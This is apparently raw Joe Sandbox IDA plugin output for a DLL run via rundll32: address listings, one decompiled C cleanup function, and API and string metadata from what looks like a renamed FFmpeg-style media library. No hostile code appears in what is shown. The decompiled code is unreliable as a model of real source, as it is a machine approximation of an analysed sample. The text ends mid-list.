                                                      0x10027d1a
                                                      0x10027d1e
                                                      0x10027d23
                                                      0x10027f46
                                                      0x10027f70
                                                      0x10027f73
                                                      0x10027f74
                                                      0x10027f74
                                                      0x10027f4e
                                                      0x10027f80
                                                      0x10027f85
                                                      0x10027f88
                                                      0x10027f88
                                                      0x10027f56
                                                      0x10027f90
                                                      0x10027f96
                                                      0x10027f99
                                                      0x10027f99
                                                      0x10027f58
                                                      0x10027f5a
                                                      0x10027f5c
                                                      0x10027f5f
                                                      0x10027f62
                                                      0x10027f62
                                                      0x10027f62
                                                      0x10027f62
                                                      0x10027d2c
                                                      0x10027d2e
                                                      0x10027d34
                                                      0x10027d34
                                                      0x10027d3a
                                                      0x10027d3c
                                                      0x10027d41
                                                      0x10027d41
                                                      0x10027d47
                                                      0x10027d49
                                                      0x10027d49
                                                      0x10027d4c
                                                      0x10027d50
                                                      0x10027d54
                                                      0x10027d58
                                                      0x10027d5b
                                                      0x10027d62
                                                      0x10027d67
                                                      0x10027d6d
                                                      0x10027d6f
                                                      0x10027d6f
                                                      0x10027d71
                                                      0x10027d73
                                                      0x10027d75
                                                      0x10027d79
                                                      0x10027d7d
                                                      0x10027d7f
                                                      0x10027d83
                                                      0x10027d85
                                                      0x10027d89
                                                      0x10027d8c
                                                      0x10027d8f
                                                      0x10027d93
                                                      0x10027d95
                                                      0x10027d98
                                                      0x10027d9a
                                                      0x10027d9c
                                                      0x10027da2
                                                      0x10027da4
                                                      0x10027daa
                                                      0x10027daf
                                                      0x10027db2
                                                      0x10027db7
                                                      0x10027dbb
                                                      0x10027dbd
                                                      0x10027dbd
                                                      0x10027dbf
                                                      0x10027dc3
                                                      0x10027dc5
                                                      0x10027dc7
                                                      0x10027dcb
                                                      0x10027dcf
                                                      0x10027dd5
                                                      0x10027dd9
                                                      0x10027ddc
                                                      0x10027de0
                                                      0x10027de7
                                                      0x10027dea
                                                      0x10027dee
                                                      0x10027df4
                                                      0x10027df6
                                                      0x10027df8
                                                      0x10027dfd
                                                      0x10027dfd
                                                      0x10027dff
                                                      0x10027e01
                                                      0x10027e07
                                                      0x10027e0a
                                                      0x10027e0e
                                                      0x10027e12
                                                      0x10027e15
                                                      0x10027e17
                                                      0x10049e8c
                                                      0x10049e8c
                                                      0x10049dd7
                                                      0x10049ddd
                                                      0x10049de1
                                                      0x10049de3
                                                      0x10049de7
                                                      0x10049dea
                                                      0x10049ded
                                                      0x10049def
                                                      0x10049df2
                                                      0x10049df2
                                                      0x10049df5
                                                      0x10049df8
                                                      0x10049dfb
                                                      0x10049dff
                                                      0x10049e03
                                                      0x10049e05
                                                      0x10049e07
                                                      0x10049e07
                                                      0x10049dd7
                                                      0x10049c93
                                                      0x10049c9b
                                                      0x10049d5d
                                                      0x10049d60
                                                      0x10049d63
                                                      0x10049d66
                                                      0x10049d6b
                                                      0x00000000
                                                      0x10049d71
                                                      0x10049ca1
                                                      0x10049ca4
                                                      0x10049d51
                                                      0x10049d51
                                                      0x10049d55
                                                      0x10049d55
                                                      0x10049ca4
                                                      0x10049caa
                                                      0x10049cb3
                                                      0x10049cb8
                                                      0x10049cbc
                                                      0x10049cbf
                                                      0x10049cc2
                                                      0x10049af6
                                                      0x10049af6
                                                      0x10049af9
                                                      0x10049afe
                                                      0x10049afe
                                                      0x10049b02
                                                      0x10049b07
                                                      0x10049c46
                                                      0x10049e48
                                                      0x10049e4b
                                                      0x10049e4c
                                                      0x10049e4d
                                                      0x10049e4e
                                                      0x10049e4e
                                                      0x10049c52
                                                      0x10049e10
                                                      0x10049e13
                                                      0x10049e16
                                                      0x10049e19
                                                      0x10049e1c
                                                      0x10049e1c
                                                      0x10049c5b
                                                      0x10049c61
                                                      0x10049c63
                                                      0x10049c65
                                                      0x10049c68
                                                      0x10049c68
                                                      0x10049c6b
                                                      0x10049c6e
                                                      0x10049c71
                                                      0x10049c75
                                                      0x10049c77
                                                      0x10049c77
                                                      0x10049c5b
                                                      0x10049b0d
                                                      0x10049b11
                                                      0x10049bc0
                                                      0x10049bc5
                                                      0x10049bca
                                                      0x10049bcd
                                                      0x00000000
                                                      0x10049bd3
                                                      0x00000000
                                                      0x10049bd3
                                                      0x00000000
                                                      0x10049b17
                                                      0x10049b19
                                                      0x10049bb0
                                                      0x10049bb0
                                                      0x10049bb4
                                                      0x10049bb4
                                                      0x10049b19
                                                      0x10049b1f
                                                      0x10049b1f
                                                      0x10049b21
                                                      0x10049b26
                                                      0x10049b28
                                                      0x10049b2a
                                                      0x10049b2e
                                                      0x10049b30
                                                      0x10049b30
                                                      0x10049b37
                                                      0x10049b3e
                                                      0x10049b40
                                                      0x10049b44
                                                      0x10049b46
                                                      0x10049b4a
                                                      0x10049b4d
                                                      0x10049b50
                                                      0x10049b53
                                                      0x10049b55
                                                      0x10049b5a
                                                      0x10049b5c
                                                      0x10049b5c
                                                      0x10049b60
                                                      0x10049b64
                                                      0x10049b68
                                                      0x10049b6f
                                                      0x10049b71
                                                      0x10049b74
                                                      0x10049b78
                                                      0x10049b7c
                                                      0x10049b7e
                                                      0x10049b81
                                                      0x10049b84
                                                      0x10049b86
                                                      0x10049b88
                                                      0x10049b8b
                                                      0x10049b8e
                                                      0x10049b94
                                                      0x10049b9b
                                                      0x10049b9b
                                                      0x10049b6f
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cb90
                                                      0x1001cb93
                                                      0x1001cb95
                                                      0x1001cb97
                                                      0x1001cb99
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cb50
                                                      0x1001cb53
                                                      0x1001cb55
                                                      0x1001cb57
                                                      0x00000000
                                                      0x00000000
                                                      0x1001ccf0
                                                      0x1001ccf4
                                                      0x1001ccf8
                                                      0x1001ccfa
                                                      0x1001ccfd
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cd10
                                                      0x1001cd14
                                                      0x1001cd18
                                                      0x1001cd1a
                                                      0x1001cd1d
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cc40
                                                      0x1001cc44
                                                      0x1001cc48
                                                      0x1001cc4a
                                                      0x1001cc4d
                                                      0x1001cc54
                                                      0x1001cc56
                                                      0x1001cc59
                                                      0x1001cc60
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cca0
                                                      0x1001cca4
                                                      0x1001cca8
                                                      0x1001ccaa
                                                      0x1001ccad
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cbf8
                                                      0x1001cbfc
                                                      0x1001cc00
                                                      0x1001cc02
                                                      0x1001cc05
                                                      0x00000000
                                                      0x00000000
                                                      0x1001ccc0
                                                      0x1001ccc3
                                                      0x1001ccc7
                                                      0x1001ccc9
                                                      0x1001cccb
                                                      0x00000000
                                                      0x00000000
                                                      0x1001ccd8
                                                      0x1001ccdb
                                                      0x1001ccdd
                                                      0x1001cce1
                                                      0x1001cc10
                                                      0x1001cc12
                                                      0x1001cc14
                                                      0x1001cc18
                                                      0x1001cc1e
                                                      0x1001cc70
                                                      0x1001cc76
                                                      0x1001cdb8
                                                      0x1001cdbd
                                                      0x1001cdc1
                                                      0x1001cdc2
                                                      0x1001cdc4
                                                      0x1001cdc8
                                                      0x1001cdc8
                                                      0x1001cc82
                                                      0x1001cda0
                                                      0x1001cda3
                                                      0x1001cda6
                                                      0x1001cda9
                                                      0x1001cdac
                                                      0x1001cdac
                                                      0x1001cc8e
                                                      0x1001cc90
                                                      0x1001cc92
                                                      0x1001cc95
                                                      0x1001cc98
                                                      0x1001cc9b
                                                      0x1001cc9b
                                                      0x1001cc8e
                                                      0x1001cc20
                                                      0x1001cc20
                                                      0x1001cc20
                                                      0x1001cc20
                                                      0x1001cc24
                                                      0x1001cd30
                                                      0x1001cd34
                                                      0x1001cd39
                                                      0x1001cd3c
                                                      0x1001cd76
                                                      0x1001cdf0
                                                      0x1001cdf3
                                                      0x1001cdf4
                                                      0x1001cdf4
                                                      0x1001cd7e
                                                      0x1001cde0
                                                      0x1001cde5
                                                      0x1001cde8
                                                      0x1001cde8
                                                      0x1001cd86
                                                      0x1001cdd0
                                                      0x1001cdd6
                                                      0x1001cdd9
                                                      0x1001cdd9
                                                      0x1001cd88
                                                      0x1001cd8a
                                                      0x1001cd8c
                                                      0x1001cd8f
                                                      0x1001cd92
                                                      0x1001cd92
                                                      0x1001cd92
                                                      0x1001cd92
                                                      0x1001cd41
                                                      0x1001cd43
                                                      0x1001cd49
                                                      0x1001cd49
                                                      0x1001cd4f
                                                      0x1001cd51
                                                      0x1001cd56
                                                      0x1001cd56
                                                      0x1001cd5c
                                                      0x1001cd62
                                                      0x1001cd62
                                                      0x1001cd5c
                                                      0x1001cc2a
                                                      0x1001cc2e
                                                      0x1001cc32
                                                      0x1001cc36
                                                      0x1001cc3a
                                                      0x1001cc3d
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cfa0
                                                      0x1001cfa4
                                                      0x1001cfa8
                                                      0x1001cfaa
                                                      0x1001cfad
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cfc0
                                                      0x1001cfc4
                                                      0x1001cfc8
                                                      0x1001cfca
                                                      0x1001cfcd
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cf60
                                                      0x1001cf64
                                                      0x1001cf68
                                                      0x1001cf6a
                                                      0x1001cf6d
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cf80
                                                      0x1001cf84
                                                      0x1001cf88
                                                      0x1001cf8a
                                                      0x1001cf8d
                                                      0x00000000
                                                      0x00000000
                                                      0x1001ced8
                                                      0x1001cedc
                                                      0x1001cee0
                                                      0x1001cee2
                                                      0x1001cee5
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cfe0
                                                      0x1001cfe3
                                                      0x1001cfe7
                                                      0x1001cfe9
                                                      0x1001cfeb
                                                      0x00000000
                                                      0x00000000
                                                      0x1001cff8
                                                      0x1001cffb
                                                      0x1001cffd
                                                      0x1001d001
                                                      0x1001cef0
                                                      0x1001cef0
                                                      0x1001cef4
                                                      0x1001cef8
                                                      0x1001cefd
                                                      0x1001cf01
                                                      0x1001cf05
                                                      0x1001cf08
                                                      0x1001cf0d
                                                      0x1001cf10
                                                      0x1001cf15
                                                      0x1001cf15
                                                      0x1001cf15
                                                      0x1001cf17
                                                      0x1001cf1b
                                                      0x1001cf24
                                                      0x1001cf26
                                                      0x1001cf2c
                                                      0x1001d016
                                                      0x1001d058
                                                      0x1001d05d
                                                      0x1001d060
                                                      0x1001d061
                                                      0x1001d065
                                                      0x1001d065
                                                      0x1001d01e
                                                      0x1001d040
                                                      0x1001d043
                                                      0x1001d046
                                                      0x1001d049
                                                      0x1001d04c
                                                      0x1001d04c
                                                      0x1001d026
                                                      0x1001d02c
                                                      0x1001d02e
                                                      0x1001d031
                                                      0x1001d034
                                                      0x1001d037
                                                      0x1001d037
                                                      0x1001d026
                                                      0x1001cf32
                                                      0x1001cf32
                                                      0x1001cf32
                                                      0x1001cf36
                                                      0x1001cf38
                                                      0x1001cf38
                                                      0x1001cf3d
                                                      0x1001cf44
                                                      0x1001cf4b
                                                      0x1001cf52
                                                      0x1001cf59
                                                      0x1001cf5f
                                                      0x00000000
                                                      0x00000000
                                                      0x1001c880
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_ripemd_initmv_sha512_init$mv_sha_init$mv_adler32_updatemv_crc
                                                      • String ID:
                                                      • API String ID: 2533704273-0
                                                      • Opcode ID: a5574497256713bb20ba09e0eacec7ebb4491d86d0e4b8baf7000fed20719829
                                                      • Instruction ID: b4fd7817c68cc5ebcb381f62e52a11943eedc005ab1a14790db74db78419b9e7
                                                      • Opcode Fuzzy Hash: a5574497256713bb20ba09e0eacec7ebb4491d86d0e4b8baf7000fed20719829
                                                      • Instruction Fuzzy Hash: 8871AFB4909701DFC754DF68C08091ABBE0FF8D354F5489AEE9898B322E735D980EB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 35%
                                                      			E1001A460(signed char __eax) {
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				void* _t68;
                                                      				intOrPtr _t74;
                                                      				signed char _t79;
                                                      				signed char _t82;
                                                      				char* _t83;
                                                      				intOrPtr _t85;
                                                      				signed int _t86;
                                                      				signed int _t89;
                                                      				intOrPtr _t90;
                                                      				signed int _t92;
                                                      				signed int _t94;
                                                      				intOrPtr _t95;
                                                      				intOrPtr _t96;
                                                      				intOrPtr* _t98;
                                                      				void* _t99;
                                                      				intOrPtr* _t100;
                                                      
                                                      				_t79 = __eax;
                                                      				_t100 = _t99 - 0x1c;
                                                      				if( *((intOrPtr*)(__eax + 0xe4)) > 0) {
                                                      					_t89 = 0;
                                                      					do {
                                                      						_t98 =  *((intOrPtr*)(__eax + 0xe0)) + _t89 * 4;
                                                      						_t89 = _t89 + 1;
                                                      						_t95 =  *_t98;
                                                      						_t96 = _t95 + 0xc;
                                                      						 *_t100 = _t95 + 0x10;
                                                      						E1000A000(__eax, _t96);
                                                      						 *_t100 = _t96;
                                                      						L10011CC0();
                                                      						 *_t100 = _t98;
                                                      						E100265C0();
                                                      					} while (_t89 <  *((intOrPtr*)(_t79 + 0xe4)));
                                                      				}
                                                      				_t90 = _t79 + 0xb8;
                                                      				 *((intOrPtr*)(_t79 + 0xe4)) = 0;
                                                      				 *_t100 = _t79 + 0xe0;
                                                      				_t85 = _t79 + 0xd8;
                                                      				E100265C0();
                                                      				do {
                                                      					 *_t100 = _t90;
                                                      					_t90 = _t90 + 4;
                                                      					E1000A000(_t79, _t90);
                                                      				} while (_t85 != _t90);
                                                      				if( *((intOrPtr*)(_t79 + 0xdc)) > 0) {
                                                      					_t94 = 0;
                                                      					do {
                                                      						_t74 =  *((intOrPtr*)(_t79 + 0xd8)) + _t94 * 4;
                                                      						_t94 = _t94 + 1;
                                                      						 *_t100 = _t74;
                                                      						E1000A000(_t79, _t94);
                                                      					} while (_t94 <  *((intOrPtr*)(_t79 + 0xdc)));
                                                      				}
                                                      				 *_t100 = _t85;
                                                      				E100265C0();
                                                      				 *_t100 = _t79 + 0x118;
                                                      				L10011CC0();
                                                      				 *_t100 = _t79 + 0x128;
                                                      				E1000A000(_t79, _t90);
                                                      				 *_t100 = _t79 + 0x12c;
                                                      				E1000A000(_t79, _t90);
                                                      				 *_t100 = _t79 + 0x140;
                                                      				E1000A000(_t79, _t90);
                                                      				if( *(_t79 + 0x40) != _t79) {
                                                      					 *_t100 = _t79 + 0x40;
                                                      					E100265C0();
                                                      				}
                                                      				_t86 = 0x178;
                                                      				 *_t100 = _t79 + 0x158;
                                                      				E1000D270();
                                                      				_t82 = _t79;
                                                      				if((_t79 & 0x00000001) != 0) {
                                                      					 *_t79 = 0;
                                                      					_t82 = _t79 + 1;
                                                      					_t86 = 0x177;
                                                      					if((_t82 & 0x00000002) == 0) {
                                                      						goto L12;
                                                      					} else {
                                                      						goto L20;
                                                      					}
                                                      					L14:
                                                      					_t83 = _t82 + _t68;
                                                      					if((_t86 & 0x00000004) != 0) {
                                                      						 *_t83 = 0;
                                                      						_t83 = _t83 + 4;
                                                      					}
                                                      					if((_t86 & 0x00000002) != 0) {
                                                      						 *_t83 = 0;
                                                      						_t83 = _t83 + 2;
                                                      					}
                                                      					if((_t86 & 0x00000001) != 0) {
                                                      						 *_t83 = 0;
                                                      					}
                                                      					 *((intOrPtr*)(_t79 + 0x100)) = 0;
                                                      					 *((intOrPtr*)(_t79 + 0xf4)) = 2;
                                                      					 *((intOrPtr*)(_t79 + 0x70)) = 0;
                                                      					 *((intOrPtr*)(_t79 + 0x74)) = 0x80000000;
                                                      					 *((intOrPtr*)(_t79 + 0x68)) = 0;
                                                      					 *((intOrPtr*)(_t79 + 0x6c)) = 0x80000000;
                                                      					 *((intOrPtr*)(_t79 + 0x104)) = 0x80000000;
                                                      					 *((intOrPtr*)(_t79 + 0x108)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t79 + 0x10c)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t79 + 0x124)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t79 + 0x7c)) = 1;
                                                      					 *((intOrPtr*)(_t79 + 0x54)) = 1;
                                                      					 *((intOrPtr*)(_t79 + 0x60)) = 1;
                                                      					 *((intOrPtr*)(_t79 + 0x50)) = 0xffffffff;
                                                      					 *(_t79 + 0x40) = _t79;
                                                      					 *((intOrPtr*)(_t79 + 0xf0)) = 2;
                                                      					 *((intOrPtr*)(_t79 + 0xf8)) = 2;
                                                      					return 2;
                                                      				} else {
                                                      					if((_t82 & 0x00000002) != 0) {
                                                      						L20:
                                                      						 *_t82 = 0;
                                                      						_t86 = _t86 - 2;
                                                      						_t82 = _t82 + 2;
                                                      					}
                                                      				}
                                                      				L12:
                                                      				_t68 = 0;
                                                      				_t92 = _t86 & 0xfffffff8;
                                                      				do {
                                                      					 *((intOrPtr*)(_t82 + _t68)) = 0;
                                                      					 *((intOrPtr*)(_t82 + _t68 + 4)) = 0;
                                                      					_t68 = _t68 + 8;
                                                      				} while (_t68 < _t92);
                                                      				goto L14;
                                                      			}





















                                                      APIs
                                                      • mv_dict_free.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A49E
                                                      • mv_freep.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A4A6
                                                      • mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A496
                                                        • Part of subcall function 1000A000: mv_freep.MAIN ref: 1000A01E
                                                      • mv_freep.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A4D0
                                                      • mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A4E6
                                                      • mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A50D
                                                      • mv_freep.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A51D
                                                      • mv_dict_free.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A52B
                                                      • mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A539
                                                      • mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A547
                                                      • mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A555
                                                      • mv_freep.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A565
                                                      • mv_channel_layout_uninit.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A578
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_buffer_unref$mv_freep$mv_dict_free$mv_channel_layout_uninit
                                                      • String ID:
                                                      • API String ID: 1735483532-0
                                                      • Opcode ID: 945f5bc7cbde55a6aa345190f856de26ec9369814dab5ad9417d2f0141cb4add
                                                      • Instruction ID: 3743f490041121a309f73bd17641a77e7b536aba58928b40e76834ce72ff9424
                                                      • Opcode Fuzzy Hash: 945f5bc7cbde55a6aa345190f856de26ec9369814dab5ad9417d2f0141cb4add
                                                      • Instruction Fuzzy Hash: 3A516CB19047028BDB10DF24C88178A77E5FF45364F0A45BADC989F38AE775E8C58BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: memcmpstrlen
                                                      • String ID: mono
                                                      • API String ID: 3108337309-2381334079
                                                      • Opcode ID: 05a9566f9cebdc7444aeb341508e8bd87ecfd7e1d953646c9f26566dae47a867
                                                      • Instruction ID: b6009183c03875402946771f74e016b0be1646e1b5b10329ba9fdfd6138aa893
                                                      • Opcode Fuzzy Hash: 05a9566f9cebdc7444aeb341508e8bd87ecfd7e1d953646c9f26566dae47a867
                                                      • Instruction Fuzzy Hash: 4D712874A083598FE314DF25C484A1ABBE2FFC8384F15892EE88997315DB70E8459B86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • The hardware pixel format '%s' is not supported by the device type '%s', xrefs: 1001E663
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_get_pix_fmt_namemv_log
                                                      • String ID: The hardware pixel format '%s' is not supported by the device type '%s'
                                                      • API String ID: 3418758923-379977042
                                                      • Opcode ID: 5dfad572c67db8fa61b7bb2c6cdad9a604c24d0b64868fd794a6f7046a9e5d28
                                                      • Instruction ID: 93c42ac0cc7c39aee4c6308fb1e9594b2517373d7f7eca67d321c97bd06f55ee
                                                      • Opcode Fuzzy Hash: 5dfad572c67db8fa61b7bb2c6cdad9a604c24d0b64868fd794a6f7046a9e5d28
                                                      • Instruction Fuzzy Hash: 4861C274608B818FC750DF29C480A0EB7E5FF88754F568A6DE998DB351E770EC818B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_mallocz$mv_realloc$mv_freep
                                                      • String ID:
                                                      • API String ID: 3944475926-0
                                                      • Opcode ID: 21c0e84fb2d2b07cdbd2145871ab2905cba1277f35f8114cc737119d02b58269
                                                      • Instruction ID: 4ee62d273146a1fe968e339e986c88b207b98d61c88eaf1789f61ff4cee38887
                                                      • Opcode Fuzzy Hash: 21c0e84fb2d2b07cdbd2145871ab2905cba1277f35f8114cc737119d02b58269
                                                      • Instruction Fuzzy Hash: BF7115B48087508FD710DF24C48471ABBE0FF8A384F568A6DE9898B369D775E980CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_logstrcmp
                                                      • String ID: %-15s $ %s%-17s $%-12s $%c%c%c%c%c%c%c%c%c%c%c
                                                      • API String ID: 3828882664-2158144587
                                                      • Opcode ID: c48dc548631b7f659bb685c49b41025a06e9f8ff27b96d58c12b2f1b24194a37
                                                      • Instruction ID: 3677ec4a8534b68b16c6bb5c66c61464159a9298d24f20388bbc5c890a847a5f
                                                      • Opcode Fuzzy Hash: c48dc548631b7f659bb685c49b41025a06e9f8ff27b96d58c12b2f1b24194a37
                                                      • Instruction Fuzzy Hash: 0F9128B5A197018FC714CF28D88065EBBE2EFC8754F55CA2EF89987395D378D8448B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • %d:%d:%d%c%d, xrefs: 1004C19B
                                                      • Valid timecode frame rate must be specified. Minimum value is 1, xrefs: 1004C3FE
                                                      • Unable to parse timecode, syntax: hh:mm:ss[:;.]ff, xrefs: 1004C3CA
                                                      • Using non-standard frame rate %d/%d, xrefs: 1004C287
                                                      • gfff, xrefs: 1004C342
                                                      • Drop frame is only allowed with multiples of 30000/1001 FPS, xrefs: 1004C30B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
